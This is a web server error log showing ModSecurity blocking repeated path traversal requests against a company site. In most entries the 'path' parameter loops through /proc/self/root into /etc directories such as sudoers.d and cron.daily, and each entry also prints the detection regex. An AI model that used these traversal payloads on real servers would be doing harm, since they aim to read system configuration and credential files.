[Mon Mar 16 08:51:25.415065 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:54536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuvdSswJuvopo3lOhIMwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:51:28.555041 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:55670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuwNSswJuvopo3lOhIPwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:51:52.396411 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:49174] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu2NSswJuvopo3lOhIYwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:51:52.488046 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:44588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu2NSswJuvopo3lOhIZAAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:51:54.787504 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:34928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu2tSswJuvopo3lOhIaAAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:51:59.485482 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.241.46:34934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu3xXjF1vJNtV6CWrhfwAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:52:01.864520 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:57170] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu4Zqj1wV0Si-OkefQugAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:52:04.627541 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:57176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu5P9ocpUE4ed4uDzVzQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:52:10.885980 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:35036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu6rysWC90G-1nBrAuEgAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:52:14.303594 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:42394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfu7hXjF1vJNtV6CWrhjAAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:52:40.987585 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:42406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfvCBXjF1vJNtV6CWrhpgAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:52:51.011758 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:35452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfvE_9ocpUE4ed4uDzV4gAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:52:57.485680 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.244.31:46032] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfvGQlT9VtDQc7bgUyRcAAAARQ"]
[Mon Mar 16 08:53:39.083579 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.243.203:50664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfvQ3bQATo66fKoS7wzzAAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:54:12.618297 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:50126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfvZNSswJuvopo3lOhItgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:54:26.519434 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:59404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfvco6lpbStxTqkSktV3QAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:54:37.521662 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:35430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfvfXjZBu2q05ozVU89VgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:55:21.215430 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:56968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfvqXbQATo66fKoS7w0FAAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:55:22.904156 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.228.16:34562] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfvqglT9VtDQc7bgUyRzwAAAQw"]
[Mon Mar 16 08:56:07.139397 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:41386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfv17ABkC4fWIHEf8HT3wAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:56:19.247613 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.241.46:57812] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfv4wlT9VtDQc7bgUySCgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:56:35.780278 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:35658] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfv846lpbStxTqkSktWvQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:56:38.555406 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.241.46:53206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfv9glT9VtDQc7bgUySMwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:56:44.341549 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.241.46:58524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfv_BXjF1vJNtV6CWrh8wAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
